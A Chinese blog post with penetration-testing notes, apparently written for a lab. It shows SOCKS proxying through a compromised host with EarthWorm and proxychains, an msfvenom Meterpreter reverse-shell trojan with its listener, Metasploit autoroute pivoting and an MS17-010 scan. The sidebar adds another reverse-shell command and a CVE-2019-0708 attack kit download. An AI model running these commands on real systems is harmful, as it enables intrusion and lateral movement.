内网渗透-做代理流量转发-msf跨网段攻击(添加路由表)-Windows中ew和proxifier做代理-kali中ew和proxychains4做代理

已于 2022-05-17 20:38:03 修改
阅读量2.1k 收藏 7
点赞数 1
分类专栏: 渗透笔记 文章标签: 安全 内网渗透 不出网 代理
于 2022-05-17 16:45:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56607768/article/details/124824731
版权

0x01代理-windows中ew和proxifier

1.在靶机上上传ew 然后输入下面命令运行,正向代理

ew_for_windows.exe -s ssocksd -l 8000

2.在windows启用proxifier,添加服务器,输入靶机上的ip和端口

3.设置代理规则

第一步截图:

请添加图片描述

第二步截图:

请添加图片描述

第三步截图:

请添加图片描述

你可以使用代理了

0x02代理-kali中ew和proxychains4做代理

1.在靶机上上传ew 然后输入下面命令运行,正向代理

ew_for_windows.exe -s ssocksd -l 8000

2.在kali攻击机上进行如下配置

vi /etc/proxychains4.conf  #修改如图下面即可

修改后的截图:进行三个地方修改即可

请添加图片描述

请添加图片描述

代理成功截图:要使用代理输入proxychains+运行的服务(msfconsole)

请添加图片描述

0x03代理-msf跨网段攻击(添加路由表)

利用msf生成马儿让目标运行,反弹回来meterpreter查看路由添加路由,然后msf就可以访问内网,可以使用msf来探测以及渗透测试。

(1)生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=6666 -f exe > /var/www/html/6666.exe

请添加图片描述

把生成的666.exe上传到边缘靶机中即192.168.0.106机器中,然后点击运行

(2)kali监听端口

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.102
set lport 4444
run

请添加图片描述

添加路由

第一步:run get_local_subnets (获取当前路由)
第二步: run autoroute -s 192.168.52.0/24 (添加路由)
第三步: run autoroute -p (查看已添加路由)

请添加图片描述

攻击pyload

第一步:background(转换到后台)

请添加图片描述

第二步:use auxiliary/scanner/smb/smb_ms17_010

请添加图片描述

h1dm
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
EW、FRP、NPS内穿透实验
热门推荐
razorx的博客
01-14 1万+
穿透实验一、EarthWorm1.建立通信2.配置隧道代理3.连接远程桌面二、FRP1.下载及配置两端的ini配置文件2.建立连接3.访问FRP服务端web管理页面4.转发机器的ssh服务5.连接远程桌面三、NPS1.下载服务端和客户端并解压2.服务端安装并启动3.新增客户端连接4.客户端主动连接5.创建tunnel隧道6.访问远程桌面四、总结五、参考文章 免责声明:本文章仅用于学习交流...
EarthWorm结合proxifier的使用学习
来到了学渣的博客
05-31 1805
拿下一个目标机器的web权限后,如何在本机就可以通过这台被拿下webshell的机器访问内的其他主机的端口服务呢? 拿下一个shell后,想要访问这个shell主机的其他内机器的服务,可以用earthworm作为一个流量转发,把ew对应的系统文件上传到这台有shell的主机进行正向或者反向的代理配置。使得攻击机可以通过这台有shell的主机在本地就可以访问目标内其他机器 Earthworm是什么 穿透神器 EarthWorm,(简称 EW) 是一套轻量便携且功能强大的络穿透工具,基于标准 C
linux-kaliproxychains4 设置终端及浏览器代理(详细步骤)
weixin_48915167的博客
03-14 1649
kali版本2024.1,虚拟机版本vmware workstation pro 17, 由于工作需要使终端和浏览器能科学上代理,查询资料后发现,常规步骤是使用系统自带的proxychains
使用ew代理导出和导入mssql数据
weixin_33875564的博客
08-21 154
最近有些忙,在51cto上了一个《Web安全评估分析及防御》专栏,说实话,针对attack的情况,如何来进行扫描,如何来进行防御,如何发现漏洞,是一件很有意思的事情,这个事情才有意义和价值,penetest仅仅是为了证明,通过技术手段,可以验证,能够拿到webshell,乃至服务器权限。在前端时间的一个penetest,由于Web服务器是站库分离,通过webshell来导出数据比较困难(M...
【内—内转发】——代理转发_ew(Earthworm)代理转发
weixin_45588247的博客
09-11 4544
文章目录一、实验环境:二、工具:三、概念:四、学习目的:五、ew(Earthworm)介绍:六、ew(Earthworm)使用说明:七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公IP):1. 场景:2. 络拓扑图:3. 说明:4. 实验过程:八、ew(Earthworm)反向代理:1. 一级代理:1.1 场景:1.2 络拓扑图:1.3 说明:1.4 实验过程:2. 二级代理(一):2.1 场景:2.2 络拓扑图:2.3 说明:2.4 实验过程: 一、实验环境: 角色 系统
【渗透测试】ew代理三层靶机穿透+proxifier配置规则
serendipity1130的博客
09-02 2593
1.远程连接: ssh [email protected] W6WEwrqD 2.msf生成木马: cd /usr/share/metasploit-framework ./msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.177.228.128 LPORT=1234 -f elf > /home/load.elf 3.上传木马payload.elf文件到一层靶机: scp -p load.elf yansiyu@
内网渗透工具Earthworm简单使用
1
02-15 3123
EW 是一套便携式的络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂络环境下完成络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条络隧道,直达络深处,用蚯蚓独有的手段突破络限制,给防火墙松土。工具包提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用。 项目地址:https://github.com/idlefire/ew 打开项目的文件,里面非常清楚的写了如何使用,我们
论后渗透MSF之 | 添加路由和代理
一醉一休的博客
09-08 6418
添加路由主要是`充当跳板`功能, 其实是MSF框架自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上`添加一条去往内的路由`,此路由的下一跳转发,即关,是MSF攻击平台与被攻击目标建立的一个session会话
内网渗透代理转发
mingyqf的博客
12-15 1794
内网渗透代理转发 内网渗透 酒仙桥六号部队 [](javascript:void(0)) 2020-09-09 8,815 这是 酒仙桥六号部队 的第 36 篇文章。 全文共计3447个字,预计阅读时长12分钟。 1 前言 谈到内转发,在我们日常的渗透测试过程经常会用到端口转发,可以利用代理脚本将内流量代理到本地进行访问,这样极大的方便了我们对内进行横向渗透。 那为什么不直接通过登陆服务器来对内其他机器进行渗透,而是通过内转发呢?意义何在呢? 因为… 大部分时候拿到权限不够,无法直接
ew代理三层靶机实验穿透
m0_58595840的博客
01-11 1115
EW工具实现三层内穿透
EW工具使用-----端口转发+流量转发
weixin_46062722的博客
02-25 3518
Earthworm工具 EW 是一套便携式的络穿透工具,具有 SOCKS v5 服务架设和端口转发两大核心功能。该工具能够以 “正向”、“反向”、“多级级联” 等方式打通一条络隧道,直达络深处,用蚯蚓独有的手段突破络限制,给防火墙松土。工具包提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内, 强烈推荐使用。官方地址:http://rootkiter.com/EarthWorm 该工具共有 6 种命令格式:(ssocksd、rcso
php-msf-docs:PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual
04-29
PHP-MSF开发手册 PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual,PHP微服务框架即,是Camera360社区服务器端团队基于Swoole自主研发的现代化PHP服务框架,简称msf或者php-msf,它的核心...
E019-渗透测试常用工具-使用cobaltstrike接口来传递MSF的shell.pdf
12-02
E019-渗透测试常用工具-使用cobaltstrike接口来传递MSF的shell
php-msf源码详解
10-18
主要介绍了php-msf源码的意思以及用法相关问题,有需要的朋友跟着参考学习下吧。
rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_
09-30
ros RTK驱动,可用于ROS开发,需要建立ROS工作空间
安全【1】——域信息收集/应用络凭证/CS插件/Android/BloodHound
最新发布
weixin_42090431的博客
04-28 531
因此,域的计算机本地管理员账号,极有可能能够登陆域较多的计算机,本地管理员的密码在服务器上后期修改的概率,远低于在个人办公电脑上的概率,而域用户权限是较低的,是无法在域成员主机上安装软件的,这将会发生下面的一幕:某个域用户需要使用viso软件进行绘图操作,于是联系络管理员进行安装,络管理员采用域管理员身份登录了域成员主机,并帮助其安装了viso软件,于是这个有计算机基础的员工,切换身份登录到了本地计算机的管理员,后执行mimikatz,从内存当抓取了域管理员的密码,便成功的控制了整个域。
标准更新丨美国发布玩具安全标准ASTM F963-23
yzc9311的博客
04-26 400
ASTM F963是根据美国联邦法规的强制性要求而制定,一般来说标准的内容充分包含了CPSC 16CFR的有关技术要求,制造商能确保产品符合ASTM F963的要求,也就基本满足了CPSC 16 CFR的有关技术要求,目前CPSC仍采用ASTM F963-17。新版标准主要修订了声响、电池可触及性、膨胀材料和弹射玩具的技术要求,另外,澄清和调整了邻苯二甲酸酯、玩具基材重金属的豁免以及溯源标签的要求,使其保持与联邦法规和美国消费品安全委员会(CPSC)的政策一致。调整了条款的次序,使其更加符合逻辑。
最佳实践之部署安全且具有韧性的AI系统
lurenjia404的博客
04-26 529
AI安全是一个高速发展的研究领域。随着各政府、行业界和学术界发现AI技术潜在弱点以及利用这些弱点的技术,除了将传统的IT最佳实践应用于人工智能系统,他们需要不断升级更新AI人工智能系统以应对不断变化的风险。
msf攻击80端口10-064
06-06
我作为AI助手不提倡攻击行为,同时也不会提供任何攻击方法和工具。请注意,未授权的攻击行为是非法的,并可能导致法律责任。我们应该遵守法律和道德规范,合法合规地进行安全工作。如果您需要了解有关漏洞检测和渗透测试的信息,建议您参加相关的培训和认证课程,以了解如何在合法、合规和道德的情况下进行安全测试和评估。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

h1dm

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值